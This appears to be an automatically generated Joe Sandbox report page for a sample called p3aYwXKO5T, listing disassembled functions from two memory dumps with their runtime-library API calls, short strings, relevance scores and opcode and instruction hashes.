Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F62

Part of subcall function 0042265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00422750

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00420FCE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420FEA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042103E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042106B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004210C1

Strings

(, xrefs: 00420F22

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 4022e65b4033ba6d99f09e60be676279313672c4fcdd80b72ccf6c64c13963d5
Instruction ID: d8c2f6391a379bc46cf5e5d5dc6ad3851f43131c5326ae158e38cbfcee68216d
Opcode Fuzzy Hash: 4022e65b4033ba6d99f09e60be676279313672c4fcdd80b72ccf6c64c13963d5
Instruction Fuzzy Hash: 89B18BB0A00625EFCB28CF58E980A7AB7F4FF48700F51416EE905AB751D374A981CB99

Function 02341869 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02342F63: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 02342F76

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 0234187B

Part of subcall function 02343076: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 023430A0
Part of subcall function 02343076: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 0234310F

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 023419AD
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 02341A0D
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 02341A19
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 02341A54
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 02341A75
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 02341A81
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 02341A8A
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 02341AA2

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 93eabb5f6ac5d02187f7c72c17f047d19682adc2335a06e087ec9b8c853274b3
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: DA811B71E106159FCB18DF68C584A6DB7F6FF48304B1545AAD489AB701CB70F992CF90

Function 00421602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00422CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421614

Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422E39
Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004217A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004217B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004217ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042183B

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 90d9306956e5cc9bb6704af0189ae29657119f80b0b7e1970bf61bc55afc2ad7
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: FA818C71F00225AFCB18DFA9D580A6EB7F1FF98304B6542AED405A7711CB74AD42CB88

Function 00442517 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00442599
_free.LIBCMT ref: 004425BD
_free.LIBCMT ref: 0044274A
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 0044275C
_free.LIBCMT ref: 00442916

Strings

XgE, xrefs: 00442705, 0044270B

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE
API String ID: 597776487-2984570469
Opcode ID: 2b6728d1d25a7a4dc5655f9f1937d483343b97d9f8a5c2cfc13cb8f05322008e
Instruction ID: df7d7efe0813b1fc9665f027b9df2e4c66d539f3229410abaef311319f10ac1b
Opcode Fuzzy Hash: 2b6728d1d25a7a4dc5655f9f1937d483343b97d9f8a5c2cfc13cb8f05322008e
Instruction Fuzzy Hash: 4AC14B71900205ABFB10AF69CE517AFBBA9EF45354F9500AFF88097391E7B88E41C758

Function 004431A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00443323

Strings

1#SNAN, xrefs: 004444BA
1#QNAN, xrefs: 004444C1
1#IND, xrefs: 004444B3
1#INF, xrefs: 004444DE

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: ce3e69247486671be022874f0fc313c548611864b1c6192d43177eab318c758e
Instruction ID: 6746934c2724dc80c2da897f8f258f2c486a7fd656fecb76804e093dbfd1dcc1
Opcode Fuzzy Hash: ce3e69247486671be022874f0fc313c548611864b1c6192d43177eab318c758e
Instruction Fuzzy Hash: 44C23971E046288FEB25CE28DD407EAB7B5EB88745F1441EBD84DE7240E778AE818F45

Function 0234EEAF Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0234EEE8

Part of subcall function 02349196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 023491B7

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0234EF4E
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0234EF66
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0234EF73

Part of subcall function 0234EA16: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0234EA3E
Part of subcall function 0234EA16: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0234EAD6
Part of subcall function 0234EA16: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0234EAE0
Part of subcall function 0234EA16: Concurrency::location::_Assign.LIBCMT ref: 0234EB14
Part of subcall function 0234EA16: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0234EB1C

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction ID: 28c8c350de7d117bd1afd0c29ce41ef8b0d62de437f232a3dc393855f7860232
Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction Fuzzy Hash: 00517135A002159BCF24EF50C894BADB7B6AF44314F1541E9ED066B396CB31BE06CBA1

Function 0042EC48 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EC81

Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042ECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042ECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042ED0C

Part of subcall function 0042E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7
Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
Part of subcall function 0042E7AF: Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
Part of subcall function 0042E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction ID: 5e7ff754d2b343dc4c16742e0cc3e1cb9d27b644ec3e5e3051372794b2f11420
Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction Fuzzy Hash: 8051E335B10225EBCF14DF52D885BAEB771AF44314F5540AAE9027B392CB78AE02CB95

Function 02356D15 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 02356E0D
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 02356E17
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 02356E24

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2eca57a45cd8ef25c7ed16031d4a9fd0f8fa1a06597ba881db52fdbbd8b3e27b
Instruction ID: e31a43a740b5dc453dd38c3aedafa01d49818bc130d49b0afe86accd76f1faa6
Opcode Fuzzy Hash: 2eca57a45cd8ef25c7ed16031d4a9fd0f8fa1a06597ba881db52fdbbd8b3e27b
Instruction Fuzzy Hash: AC31B37490132CABCB21DF64DD89BDDBBB8BF08311F5041EAE91CA6250EB709B818F45

Function 00436AAE Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00436BA6
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00436BB0
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00436BBD

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2eca57a45cd8ef25c7ed16031d4a9fd0f8fa1a06597ba881db52fdbbd8b3e27b
Instruction ID: 1f0ad2aab0448583845f395018efff8d75f4c1db1d39540b3f2c6e774d71cf18
Opcode Fuzzy Hash: 2eca57a45cd8ef25c7ed16031d4a9fd0f8fa1a06597ba881db52fdbbd8b3e27b
Instruction Fuzzy Hash: 5D31C474901329ABCB21DF69DD897CDBBB4BF08314F5091EAE40CA7291E7749B818F49

Function 02356792 Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,02356791,?,?,?,?,?,023578C8), ref: 023567B4
TerminateProcess.KERNEL32(00000000,?,02356791,?,?,?,?,?,023578C8), ref: 023567BB
ExitProcess.KERNEL32 ref: 023567CD

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
Instruction ID: cc15564f0e57ab9c3f554ad0ef221056baae35935574c788d1e0f531d92fcb7d
Opcode Fuzzy Hash: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
Instruction Fuzzy Hash: 4EE0BD35000728ABDF226F64DD89E483B6AEB40B42F554924FC098A532CB36E982DF85

Function 0232092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02320966
., xrefs: 0232095F
GetProcAddress., xrefs: 023209DC, 023209DF, 023209E4

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 082ef58166f4d40fb8a9f6fa8300d13f40255ea08fa20b1c3f9b669fb0e2bf8e
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: B73148B6901619DFDB14CF99C880AAEBBF9FF58324F14404AD841B7221D771EA49CFA4

Function 02362F77 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f1bd2685e55997c2703fc258bc759cbf20cb8828056bff6a68c166f696af58
Instruction ID: ffac569fe3c99296757903c70dda937772667324f8b80e96fb252421d23d68bd
Opcode Fuzzy Hash: 38f1bd2685e55997c2703fc258bc759cbf20cb8828056bff6a68c166f696af58
Instruction Fuzzy Hash: 81F14F71E002199FDF14CFA9C884AADFBF5FF88714F2582A9D919AB344D731A941CB90

Function 00442D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
Instruction ID: 0f1af51de5af96b730dc073be6187f45225b05d1e39be70f77c0bb50ba676d41
Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
Instruction Fuzzy Hash: 9BF14F71E002199FEF14CFA9C9806AEB7B1FF88714F25826EE915A7344D735AE01CB94

Function 023672B0 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,023672AB,?,?,00000008,?,?,02366131,00000000), ref: 023674DD

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
Instruction ID: a7c3f9def0a6ad2ee50099eef9a44c98b924c96a85d86ce3b94a7ed2a5586c6c
Opcode Fuzzy Hash: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
Instruction Fuzzy Hash: 11B15E31610608CFD715CF28C48AB65BBE4FF45368F69C698E999CF2A5C335E982CB40

Function 00447049 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00447044,?,?,00000008,?,?,00445ECA,00000000), ref: 00447276

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
Instruction ID: 7a8e5148774215697cf91bc212fe3b67d35b5c5a8621f41dfb32136176b2c313
Opcode Fuzzy Hash: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
Instruction Fuzzy Hash: 9CB15D31614605DFE728CF28C486B657BE0FF45365F258699E89ACF3A1C339E982CB44

Function 0041DD91 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0041DDA7

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
Instruction ID: 73b31feacec7ce9fe7b0550b3c6203be5604da4ad9e3037c20952e2b0bfc5a30
Opcode Fuzzy Hash: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
Instruction Fuzzy Hash: E251B0B2D05B068BDB15CF58D8917AAB7F1FB48304F24856BC405EB350E3B8A980CF59

Function 0235DE74 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c254cc85ab78f1b64420c7fda183827d5ac03fcf9b54031427e7e9148f272146
Instruction ID: b0e7891676d474c651be4fd8a6d0716dfdac685a212a96e047f11ae074fb2eee
Opcode Fuzzy Hash: c254cc85ab78f1b64420c7fda183827d5ac03fcf9b54031427e7e9148f272146
Instruction Fuzzy Hash: D841AFB180422DAEDB20DF69CC88EEABBBDAF45304F1442D9E85DD3210DA319E848F50

Function 0043DC0D Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c254cc85ab78f1b64420c7fda183827d5ac03fcf9b54031427e7e9148f272146
Instruction ID: 3d492b1ce9647cc9b8e1ba87239a284fe88898690c8d91de180f89449a84ea2b
Opcode Fuzzy Hash: c254cc85ab78f1b64420c7fda183827d5ac03fcf9b54031427e7e9148f272146
Instruction Fuzzy Hash: 2241C6B1C0421DAEDB20DF69DC89AAAB7B9EF49304F1452DEE41DD3201DA389E84CF54

Function 0041CB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0041CBAA

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
Instruction ID: 734eec717fe04ada3b4bcf7b1b1ccceb46d859c39f6a646686bea7d52c1b0365
Opcode Fuzzy Hash: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
Instruction Fuzzy Hash: DFB09236A1B93047CA512B14BC4859E7714AA80B1270A01A6E805A72348A54AD828BDD

Function 0041DD0A Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001DD16,0041D755), ref: 0041DD0F

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 43c617bf8b0786d196ab8e975300d48b22b3ddc598e3c16071a78d30c9f3b4c1
Instruction ID: acbc3c9ff04c2f6a81d4fdca068cfbd79b9dcce843e89fee5e28ccbd35d34f0d
Opcode Fuzzy Hash: 43c617bf8b0786d196ab8e975300d48b22b3ddc598e3c16071a78d30c9f3b4c1
Instruction Fuzzy Hash:

Function 0235819D Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 02358319

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: ee271383ac05f0844c2c722b2058a6e2687b9cff14d859418b80c2ae3a411f12
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 34516E70614A789ADF385A288895FBE7F9B9F02308F04451DCC4EDB682DB21DEC6C716

Function 00437F36 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 004380B2

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: b34b47e9f09f915a8cdca993c5e9340bbf8146411caf7b554e1449dba65cbcf0
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: C15128B02087446ADB3C4A2888957BFE7AAAB1D304F14351FF4C297392CE5D9D4A925E

Function 02344058 Relevance: 1.4, Strings: 1, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

Strings

4, xrefs: 023441F2

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

